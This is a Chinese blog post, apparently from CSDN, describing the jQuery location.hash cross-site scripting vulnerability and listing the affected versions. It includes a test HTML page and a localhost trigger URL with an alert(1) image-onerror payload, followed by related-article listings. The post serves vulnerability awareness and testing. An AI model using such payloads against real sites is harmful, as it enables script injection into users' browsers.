JQuery跨站脚本漏洞

最新推荐文章于 2024-05-13 15:15:50 发布
最新推荐文章于 2024-05-13 15:15:50 发布
阅读量2.9w 收藏 15
点赞数 5
分类专栏: Web漏洞
本文探讨了jQuery中由于正则表达式过滤用户输入数据的缺陷,导致的location.hash跨站脚本漏洞。受影响的jQuery版本包括1.7.1至1.8.3,1.6.x,1.5.x,1.4.x和1.3.x及1.2.x。通过测试代码`<img src=/ onerror=alert(1)>`,可以在本地环境中复现此漏洞。同时,提供了一个在线测试平台以进行进一步的分析。
摘要由CSDN通过智能技术生成

原理:

    jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞

影响版本:

  •     jquery-1.7.1~1.8.3
  •     jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js
  •     jquery-1.5所有版本
  •     jquery-1.4所有版本
  •     jquery-1.3所有版本
  •     jquery-1.2所有版本

测试代码:

<html>
<head>
    <title>JQuery-xss-test</title>
    <script  src="https://code.jquery.com/jquery-1.0.1.js" ></script>
    <script>
    $(function(){
    try { $(location.hash) } 
    catch(e) {}
    })
    </script>
</head>
<body>
    Jquery xss test.
</body>
</html>

然后访问如下:http://localhost/#<img src=/ οnerrοr=alert(1)>

在线测试平台:JQuery跨站脚本在线测试

谢公子
关注
专栏目录
订阅专栏
安全扫描五项简介_cve-2015-9251
04-12 313
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
jQuery 跨站脚本漏洞
weixin_30664051的博客
03-13 1118
漏洞名称: jQuery 跨站脚本漏洞 CNNVD编号: CNNVD-201303-203 发布时间: 2013-03-12 更新时间: 2013-03-12 危害等级: 漏洞类型: 跨站脚本 威胁类型: 远程 CVE编号: CVE-2011-4969 ...
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 2082
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
跨站脚本漏洞
weixin_46729085的博客
09-08 3981
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
jQuery Mobile 漏洞跨站脚本攻击风险】 jQuery Mobile 是一款广泛使用的前端开发框架,特别是针对响应式Web应用和移动设备优化。作为jQuery框架的一个组件,它提供了丰富的功能,包括对HTML5的支持,使得开发者...
跨站脚本漏洞(XSS)示例
04-15
NULL 博文链接:https://songjianyong.iteye.com/blog/1754973
jquery-1.8.3.js
09-28
jquery-1.8.3.js jquery-1.8.3.js jquery-1.8.3.js jquery-1.8.3.js jquery-1.8.3.js jquery-1.8.3.js jquery-1.8.3.js jquery-1.8.3.js jquery-1.8.3.js
jquery-1.8.3.min.js
04-20
包含了jquery-1.8.3.js和jquery-1.8.3.min.js两个不同的版本 jQuery1.8.3更新日志 IE8中的HTML相关Bug jQuery1.8.2在IE9中调用ajax失败的问题 jQuery1.7.1不能正确地设置IE7中克隆元素的tabindex属性 压缩的JS文件包含非ASCII字符 如果body样式设置为display:none,则$('body')。show()无法工作 在IE9中element.css('filter')返回不明确 在Android 2.3.4的浏览器中,jQuery 1.8.1转场效果崩溃 在iPad上缩放一个灯箱效果后,所有动画效果失效 从1.3.2升级到1.8.2版本后,出现Uncaught TypeError错误 在Chrome和Safari中,无法正确检测包含可编辑内容的DIV的焦点
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
主机扫漏:jQuery 跨站脚本漏洞修复建议 | 升级tomcat服务解决Apache Tomcat 环境问题漏洞(CVE-2023-46589)【安装多个tomcat服务】
最新发布
iOS逆向与安全
05-13 970
目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr。Apache Tomcat存在环境问题漏洞,该漏洞源于存在不正确的输入验证漏洞,可能会导致将单个请求视为多个请求,从而在反向代理后面出现请求走私。
jquery跨站脚本漏洞
09-02
jQuery跨站脚本漏洞主要是由于其在处理用户输入时,没有充分验证用户输入的安全性。 这种漏洞的利用方式大致分为两种:一种是对用户输入的数据进行恶意修改,然后以用户的身份执行一些不被授权的操作;另一种是...
jQuery跨站脚本漏洞
weixin_50464560的博客
08-21 2261
原理:     jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响版本:     jquery-1.7.1~1.8.3    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min...
Jquery-1.8.3中的BUG
wttyzy的专栏
02-02 4710
ie和firefox一直遇到这个问题 ---------------------------------------------------------------------------------- |   typeError:elem.nodeName.toLowerCase is not a function  | -------------------------------
jQuery导致的XSS跨站漏洞
weixin_45908624的博客
11-17 5427
jQuery导致的XSS跨站漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值